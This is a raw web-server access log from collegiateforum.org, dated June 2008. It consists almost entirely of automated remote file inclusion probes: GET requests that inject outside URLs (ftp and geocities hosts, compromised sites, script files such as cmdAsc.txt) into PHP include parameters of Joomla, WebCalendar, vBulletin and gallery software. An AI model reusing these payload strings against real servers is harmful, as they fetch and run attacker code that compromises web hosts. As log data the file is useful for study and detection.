89.108.91.166 - - [22/Jun/2008:18:57:50 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:00:27 -0700] "GET /logs/access_080324.log//appserv/main.php?appserv_root=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:00:27 -0700] "GET //appserv/main.php?appserv_root=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:00:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:19:03:12 -0700] "GET //?mosConfig_absolute_path=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:19:03:12 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:19 -0700] "GET /logs/scripts.log/index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:24 -0700] "GET /logs/scripts.log/index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:29 -0700] "GET /index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:35 -0700] "GET /index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:40 -0700] "GET /logs/index.php3?p=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:19:06:45 -0700] "GET /logs/index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.203.223.25 - - [22/Jun/2008:19:09:10 -0700] "GET //appserv/main.php?appserv_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:19:09:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:19:09:23 -0700] "GET //ashnews.php?pathtoashnews=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
207.218.234.146 - - [22/Jun/2008:19:09:25 -0700] "GET /logs/start.php?s=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.218.234.146 - - [22/Jun/2008:19:09:26 -0700] "GET /start.php?s=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.218.234.146 - - [22/Jun/2008:19:10:24 -0700] "GET /logs/main.php?fset=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.218.234.146 - - [22/Jun/2008:19:10:24 -0700] "GET /main.php?fset=http://geocities.com/vikamaniez/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
213.203.223.25 - - [22/Jun/2008:19:10:54 -0700] "GET /logs/access_080324.log//appserv/main.php?appserv_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.203.223.25 - - [22/Jun/2008:19:10:54 -0700] "GET //appserv/main.php?appserv_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.203.223.25 - - [22/Jun/2008:19:10:55 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:11:23 -0700] "GET /logs/access_080324.log/pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:11:23 -0700] "GET /pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:11:24 -0700] "GET /logs/pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:19:12:22 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:12:45 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:12:45 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:12:50 -0700] "GET /logs//impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:19:12:50 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:12:50 -0700] "GET //impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:17:20 -0700] "GET /logs/access.log/pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:17:20 -0700] "GET /pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
217.31.58.188 - - [22/Jun/2008:19:17:20 -0700] "GET /logs/pagina.php?include=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:29 -0700] "GET /logs/access_080107.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:29 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:33 -0700] "GET /logs/access_080121.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:42 -0700] "GET /logs/access.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:42 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:54 -0700] "GET /logs/access_080107.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:54 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:55 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:18:58 -0700] "GET /logs/access_080121.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:19:37 -0700] "GET /logs/access.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:19:37 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:19:37 -0700] "GET /logs/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:19:19:41 -0700] "GET /logs/access_080324.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:20:44 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:20:48 -0700] "GET /logs/access_080121.log/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:20:48 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:20:48 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:22:16 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.191.40.213 - - [22/Jun/2008:19:22:59 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://webhosting.i2.co.id/mestre101/list.jpg?.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
64.191.40.213 - - [22/Jun/2008:19:23:04 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://busca.uol.com.br/uol/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:23:07 -0700] "GET /logs/access_071231.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:23:07 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:23:07 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:17 -0700] "GET /logs/access.log//vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:17 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:18 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:19 -0700] "GET /logs/access.log//impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:20 -0700] "GET //impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:23:20 -0700] "GET /logs//impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
68.21.80.84 - - [22/Jun/2008:19:24:19 -0700] "GET /logs/access.log HTTP/1.1" 200 63408 "http://www.collegiateforum.org/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:24:56 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:25:17 -0700] "GET /logs/access_080107.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:31:33 -0700] "GET /logs/access_071210.log//aedatingCMS.php?dir%5Binc%5D=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:31:33 -0700] "GET //aedatingCMS.php?dir%5Binc%5D=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:19:31:33 -0700] "GET /logs//aedatingCMS.php?dir%5Binc%5D=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
72.3.224.31 - - [22/Jun/2008:19:32:38 -0700] "GET /logs/access_080421.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:34:44 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:34:45 -0700] "GET /?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 934 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:34:45 -0700] "GET /logs/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:35:14 -0700] "GET /logs/access_071224.log/?mosConfig_absolute_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET /logs/access_080121.log//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET /logs/access_080121.log//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET //WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET //events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET /logs//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:36:23 -0700] "GET /logs//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:36:49 -0700] "GET /logs/access_080421.log//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:36:49 -0700] "GET //classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:19:36:49 -0700] "GET /logs//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.6.22.153 - - [22/Jun/2008:19:37:17 -0700] "GET / HTTP/1.0" 200 918 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:37:21 -0700] "GET /logs/access.log//WebCalendar/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:37:25 -0700] "GET /logs/access.log//events/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:38:09 -0700] "GET /index.php?fase=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:38:09 -0700] "GET /logs/index.php?fase=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "collegiateforum.org"
190.196.13.90 - - [22/Jun/2008:19:38:40 -0700] "GET /logs/nav.php?pg=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
190.196.13.90 - - [22/Jun/2008:19:38:42 -0700] "GET /logs/nav.php?pg=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
190.196.13.90 - - [22/Jun/2008:19:38:44 -0700] "GET /nav.php?pg=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
190.196.13.90 - - [22/Jun/2008:19:38:46 -0700] "GET /nav.php?pg=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:38:52 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:38:52 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:38:52 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:39:23 -0700] "GET /logs/access_080310.log//vbull/impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:39:23 -0700] "GET /logs/access_080310.log//impex/ImpExData.php?systempath=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:19:39:51 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:19:39:51 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:19:39:52 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:19:39:52 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:12 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:12 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:12 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:12 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:19 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:19:40:19 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:40:25 -0700] "GET /index.php?fase=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:40:25 -0700] "GET /logs/index.php?fase=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:19:40:51 -0700] "GET /logs/access.log/all%22.php?systempath=%22http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:19:40:52 -0700] "GET /all%22.php?systempath=%22http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:19:40:52 -0700] "GET /logs/all%22.php?systempath=%22http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:41:33 -0700] "GET /logs/access_080121.log//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:41:34 -0700] "GET //cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:41:34 -0700] "GET /logs//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
